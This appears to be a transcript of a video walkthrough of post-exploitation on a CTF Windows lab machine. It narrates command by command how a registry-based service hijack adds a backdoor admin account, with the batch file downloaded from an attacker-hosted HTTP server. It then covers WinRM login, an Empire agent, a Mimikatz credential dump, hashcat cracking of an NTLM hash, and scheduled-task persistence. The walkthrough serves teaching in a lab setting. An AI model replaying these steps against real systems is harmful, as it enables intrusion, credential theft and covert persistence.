Hey, so this is the last in our series of remote exploitation of the client dev CTF. And what I wanted to show you guys is what's possible after I elevate my privileges. So we've been talking about, the goal is to elevate privileges. And now we're going to show why. I want to talk about some of the enumeration we can do after we elevate our privileges, how we can gain some persistence. So I'm going to be recording this, and I'm going to be recording this with the antivirus on. So we might run into some hiccups that we're going to have to troubleshoot through. I just wanted to do the proof here. So real-time antivirus protection is on, not cloud and sample submission, because I don't want any of the stuff that I'm doing right here to get submitted up, but real-time virus protection is on. So first thing we're going to do is we're going to go back in and we're going to re-exploit the registry key vulnerability that we had exploited before, but we're going to do it in a little bit different manner. So right now our IP address for this box is 21, I believe. Let's check again. Yep, so 21. So we're the low privilege user. And now we're going to reconnect and we're going to redo our registry-based privilege escalation. We're going to do it a little bit differently this time, and we'll talk about why. So we're going to go to cd hkey local machine, cd software, cd vulnerable service. And then remember, we need to do new item property, right? So we need to do new item property. And then we want the path to be hkey local machine. And then it's going to be software, vulnerable service. And then the name, I believe. Let's look at that. Yep, name. Name needs to be cleanup script location. And then the value, this time is going to be c:\dev tools, and then we're going to do add user.bat. So what we're going to do this time is instead of getting a shell back directly, what we're going to do is we're going to add a user, an administrative user. Okay, so then let's go back through here and let's say, okay, let's create that. So sudo v add user.bat. So now we're going to say, okay, net user hacked. And then here's the passwords. We'll do password 123, and then we'll do add. And then we'll also chain together and net local group administrators hacked add. And I believe that is the syntax. Let's take a look. Command line add local admin. And we'll take a look here. So net users / add username password. So we got that net user hacked password add, right? And then we got net local group administrators username add. Net local group administrators username add. Okay, great. So it looks like we're good there. So let's go ahead and save that. Make sure net user hacked password 123 add, and net local group administrators hacked add. Perfect. So we've got that here. So let's do sudo python 3 http.server on port 80, right? Whoops, I forgot to say tac m. So sudo python 3 tac m. Now we're serving that up here. So now we're going to add this registry entry, and it looks like it added. So now we want to go to cd c:\dev tools. And I cleared some stuff out so that we could redo this exploit for the registry key. Because of the way I have the service build, it won't redo the exploit over and over and over if the flag file is there. So I just removed that, and I removed the other ones for convenience too, so it looked clean. So we've got that here. So now what we need to do is IEX new object net.web client.download file http 192.168.0.52 add user.bat, and we want to save that to C:\dev tools add user.bat. So this should happen pretty quickly. I've got the timer on the service set pretty low, so it should happen pretty quickly. So once we hit this, we should see over here on our screen that we did get a hit on our download. And we'll look in here. We see add user.bat is there and cleanup solved is there. So now what we should be able to do is we should be able to do eval win rm, and then we should be able to say, let's check the IP address. The IP address I can't remember was 192.168.0.21 now. So 192.168.0.21. And we're going to say user hacked, and password is going to be password 123. And because they're an administrator, they automatically have rights to go onto this machine through WinRM if WinRM is enabled. So let's make sure we're an administrator. And there's root.txt. So we are now an administrator on this machine. Now that we're an administrator on this machine, we can do lots of privileged things. We can dump passwords, we can do all kinds of other things. And so what we're going to do is we're going to switch to a post-exploitation framework. Now that we've got the exploit, we've got the foothold, we're going to switch to a post-exploitation framework called Empire. I'm not going to go too deep into what Empire is, but what I am going to do is I am going to enable bypass some Windows protections, and then I'm going to pause the video real quick while I bypass the Windows protections and get myself a listener over here in Empire. I'm not going to show you how to bypass the Windows protections. If you really want to learn, I can teach you individually, but I'm not going to record a video of it. So give me 1 second, we'll be right back. Okay, we're back. So I bypassed the Windows protections for antivirus, and I was able to get an Empire agent, and just to prove that this machine is still up and Windows Defender still running, it's right here, still up, Defender's still there, real-time protection still enabled. So I bypassed Windows Defender, I bypassed all the protections that are there, and now we have this agent called devctf. You can see that the username is devctf hacked, and you can see that this star indicates that we are a high privilege administrative user. So now that we have this, let's go and see what we can do. So let's interact with devctf, and let's run Mimikatz. Mimikatz is a password stealing application. It allows you to audit passwords and get passwords. So we're going to run Mimikatz, and in just a second it should run. Pause the video and be right back as soon as that task is finished. Oh, it's running right now. Didn't even have to pause. So let's take a look here. Started, should be running. And there we go. So Mimikatz went through and dumped all the local hashes and dumped all of the passwords from any logged on users that it could find in memory. So as you can see here, we have the user standard, and it got the NTLM, which is a Windows password hash. And then you can see we have, again, the username standard. It's getting some more credential keys. And then what we can do now is we can say, okay, let's go back and let's look at creds that we have captured. So we've got 2 captured creds here. So we've got the only users that have logged into here is standard, and then when I created this was the name of the machine, and this was the password that was there. So the only users who have logged into this machine that have had their credentials cached on that machine is the user standard. So what we're going to do is we're going to take this, and we are going to say, okay, let's try to crack this hash. And let's go into the client CTF folder, and let's admin password, and we'll put that in there. So here's the hash for the password. So now we're going to run hashcat. Let's say hashcat tag m is 1000 because this is NTLM. Admin password is the hash, and the user list is going to be in the word list is going to be in user share word list. And then rocku is what we're going to do. Because we're on a VM, we're going to run force. Now, if you have any questions about this, I'll break it down real quick. Hashcat is a password cracking program. This is the type of hash that we're passing in, which is NTLM. This is the file that contains the hash, and this is our dictionary that we're using to crack those hashes, and this is us forcing it. If you have any questions about this, I'd love to teach you about Hashcat. Just reach out to me. I don't want to dig too deep into Hashcat though, but we're going to go ahead and run that. And that was cracked instantly. And this is on a suboptimal machine for cracking hashes because it's a virtual machine. On our physical cracking machine, which we do have for the company, this would have cracked even faster. So we can crack something to the tune of like a couple million per second NTLM hashes is how many compute cycles it does. So we can see we cracked the password, and the password is password 123, which is the same one we chose for the hacked user. Now, we can verify that that is a good password by using evil-winrm, right? And then we can say attack I is 192.168.0.21, and the user is going to be standard. The password is going to be password 123. And you can see we were able to crack the password. We were able to get access to that machine as the administrative user by using a low privilege account, compromising a service, grabbing the password of the real admin, cracking the password of the real admin, and now we have access as that admin and the admin that we created. So now that we have these things, what else can we do? So we can get persistence on the machine by creating a scheduled task. We can do lots of different stuff. So let's take a look here, and let's go back, and we're going to go into agents again, and let's do use module, and then we want to do PowerShell persistence. Let's see what we have for persistence. We have elevated registry, RID hijack, scheduled tasks, WMI updater, net user, so we could add another user in here. We could install SSP. So there's a lot of different things that you can do here. So let's add a scheduled task. So let's add a scheduled task. So let's do elevated, and then let's do scheduled tasks. Oops. So what we've got here is, so what I need to do is get rid of the star, and let's take a look at the info that it wants here. So the agent, right now we need to set agent of dev CTF, and then we need to set listener to HTTP, and then we need to set on logon. Well, we can leave on logon as false, and the registry path looks fine, and then let's ADS path. All of this looks good, and let's go ahead and execute. It's not OPSEC safe because it's going to create a scheduled task that anyone can look at. So let's take a look at it. Let's go back. Let's go back. Let's go to agents and list. Let's interact with dev CTF. And now we have a daily trigger that has been created. The scheduled task updater has been successfully created using this listener stored in there. So they created a registry key with an updater daily trigger at 9 o'clock. So every day at 9 o'clock, and this is military time, I believe 24-hour time. So every day at 9 o'clock, it will redo this listener as this administrative user. So why does it matter to elevate your privileges? It matters because then we can do all kinds of things to maintain persistence. Now, anyone else that logs into this machine, we can capture their hashes. We can do lots of things. So privilege escalation is a big deal. We want to close privilege escalation vulnerabilities. We don't want to allow privilege escalation. If you guys have any questions about this, love to work with you more on it, and we'll see you next time.